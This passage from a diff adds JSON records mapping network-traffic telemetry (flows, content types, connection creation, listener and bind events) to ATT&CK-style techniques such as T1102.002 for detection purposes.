This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1102.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
